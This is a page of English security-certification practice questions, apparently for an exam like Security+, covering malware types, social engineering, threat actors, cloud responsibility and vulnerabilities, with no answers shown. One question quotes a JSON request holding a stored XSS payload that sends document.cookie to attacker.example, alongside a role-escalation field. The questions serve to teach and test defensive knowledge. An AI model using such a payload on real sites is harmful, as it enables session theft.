Tüm alıştırma soruları
2232 soru
A security team is evaluating testing methodologies to identify vulnerabilities within a newly deployed web application. To satisfy compliance standards, the team must implement security testing techniques that analyze the application while it is actively executing in a target runtime environment. Which of the following assessment methods fulfill this requirement? (Select TWO)
Geçerli olan tümünü seçin
A system administrator downloaded a third-party system maintenance utility disguised as a performance optimizer. Upon execution, the application created a persistent registry entry under `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`, established an encrypted outbound connection to an external IP address, and injected code into system processes to monitor keyboard inputs. Which of the following technical characteristics and indicators of compromise (IoCs) distinguish this threat as a Trojan with spyware capabilities rather than a self-propagating network worm? (Select TWO.)
Geçerli olan tümünü seçin
A healthcare enterprise recently integrated a third-party remote patient monitoring service that communicates via HTTPS with an internal API gateway. During an incident investigation, security analysts discovered that an attacker who obtained a compromised, revoked private key from a former partner company successfully established a man-in-the-middle (MitM) session and exfiltrated sensitive patient records. The API gateway validated that the presented certificate was issued by a trusted Certificate Authority (CA) and had not reached its expiration date, but failed to inspect current revocation data. Which cryptographic control weakness directly allowed this unauthorized session to be established?
A regional water treatment utility discovers an advanced network intrusion. Forensic investigators determine that the threat group maintained undetected persistence within the operational technology (OT) network for over nine months. Rather than deploying ransomware or causing immediate service disruption, the group focused exclusively on collecting SCADA configuration files and mapping control system logic. Which TWO of the following threat actor attributes and vector profiles most accurately describe this incident? (Select TWO)
Geçerli olan tümünü seçin
During an incident investigation at a biotechnology research facility, forensic analysts discover that an adversary gained initial network access through a compromised third-party software supply chain, utilized unpublished zero-day vulnerabilities targeting the underlying virtualization hypervisors, and established covert, out-of-band command-and-control channels to exfiltrate proprietary genomic sequencing intellectual property. The intruder maintained stealthy persistence for over ten months without altering system integrity, deploying ransomware, or publishing defacement material. Which threat actor profile MOST accurately aligns with the observed attributes, capabilities, and attack vector?
A human resources administrator receives an unexpected phone call from an individual claiming to be a senior IT compliance auditor. The caller asserts that an emergency vulnerability audit of the enterprise payroll database is currently underway and demands immediate provision of temporary administrative credentials to avoid a severe regulatory non-compliance fine. To establish credibility, the caller references specific internal department codes obtained from an employee's public professional profile. Which social engineering technique and combination of influence principles is the attacker primarily utilizing in this attack scenario?
An enterprise organization is migrating its core billing application to a public cloud using an Infrastructure as a Service (IaaS) deployment model. Which of the following security tasks remain the direct responsibility of the enterprise customer within this framework? (Select TWO.)
Geçerli olan tümünü seçin
A security technician investigating an isolated endpoint alert reviews host telemetry and memory capture files. The triage report indicates that a persistent process executing from `%APPDATA%` invokes the system API `SetWindowsHookEx` to intercept keystrokes, while simultaneously establishing an encrypted reverse shell back-connect over TCP port 443 to a remote host. The process modifies system registry run keys for boot persistence, but shows no network scanning or self-replication capabilities across local SMB shares. Which of the following malware classifications and technical indicators accurately describe this malicious activity? (Select TWO.)
Geçerli olan tümünü seçin
A user downloads a free utility program from an unverified website. After executing the installer, the utility operates as advertised, but it secretly opens a backdoor to establish unauthorized remote access for an attacker. Which malware classification best describes this malicious software?
A system administrator is reviewing a web application's legacy configuration and discovers that user passwords are saved in the database using the MD5 hashing algorithm without any salt. Which cryptographic weakness does this implementation exhibit?
A cybersecurity analyst at a software development firm is investigating an incident where unauthorized code was introduced into a production build pipeline. The incident response log indicates two distinct actions taken by the threat actor: first, developers received bogus IT support tickets directing them to re-authenticate at an external single-sign-on domain (`login-company-auth.com`) that mimicked the company's internal portal; second, the attacker uploaded malicious software libraries to a public package repository using names with subtle typographical variations of legitimate internal dependencies (e.g., `core-utils-lib` vs. `core-utiis-lib`). Which of the following social engineering attack techniques were directly executed in this scenario? (Select TWO.)
Geçerli olan tümünü seçin
An enterprise security operations center is reviewing four complex, multi-stage security incidents involving targeted human manipulation. Match each social engineering tactical delivery technique on the left to the corresponding operational scenario indicator on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
An IT administrator discovers that network administrators are remotely connecting to core switches over an unencrypted Telnet connection on TCP port 23, exposing administrative credentials to internal network sniffing. Which of the following is the BEST solution to mitigate this host and network vulnerability?
A critical infrastructure energy provider discovers an undetected intruder within its operational technology (OT) network. Investigation reveals the threat group utilized undisclosed zero-day exploits targeting proprietary industrial controllers, maintained covert persistence for over two years without executing ransomware or financial extortion, and possessed multi-disciplinary capability across hardware and software engineering. Which TWO of the following threat actor attributes and classifications best describe this threat group?
Geçerli olan tümünü seçin
An enterprise security analyst is designing a vulnerability assessment program for critical hybrid-cloud server infrastructure. The organization mandates that the assessment methods must identify missing host-level OS security patches and detect cleartext sensitive data transfers without sending disruptive synthetic network probes across production subnets. Which TWO of the following vulnerability assessment and testing techniques should the analyst implement? (Select TWO.)
Geçerli olan tümünü seçin
A software security analyst is reviewing a web application's API logs and controller implementation following a reported security incident. The backend service processes JSON payloads for user profile updates. An audit log captured the following HTTP POST request body submitted by an authenticated non-administrative user:
{
"account_id": "8492",
"email": "[email protected]",
"role": "administrator",
"bio": "<script>fetch('http://attacker.example/collect?c='+document.cookie)</script>"
}
Upon processing this request, the backend database successfully updated the user's account role to 'administrator' and subsequently rendered the script payload when other users viewed the updated profile page.
Which of the following software vulnerabilities were successfully exploited in this incident? (Select TWO.)
Geçerli olan tümünü seçin
A political organization's public website was recently defaced with messages promoting a specific social cause. Investigators determined that the attackers utilized low-sophistication web tools and were primarily driven by ideological motives rather than financial profit or state-sponsored espionage. Which of the following threat actor types best describes the perpetrators of this attack?
A security analyst inspects system configurations and network routing logs for a mission-critical database host following an internal security audit:
[SYS_AUDIT] Host: db-prod-01.internal (IP: 192.168.10.45)
[WARN] Service 'legacy-telemetry-daemon' active on 0.0.0.0:9090
[INFO] Configuration file /etc/telemetry.conf sets AUTH_REQUIRED=FALSE
[WARN] API endpoint provides unencrypted remote memory telemetry dumps via HTTP GET /sys/memdump
[WARN] Host routing table permits unrestricted cross-VLAN traffic from Staging-VLAN (10.20.0.0/16)
Based on the log output and audit findings, which of the following vulnerabilities or architecture deficiencies are directly present in this environment? (Select TWO.)
Geçerli olan tümünü seçin
A security technician is categorizing host and network vulnerabilities discovered during an enterprise infrastructure audit. Match each vulnerability descriptor on the left with its primary architectural risk on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
Match each malware type on the left with its corresponding technical indicator of compromise (IoC) on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler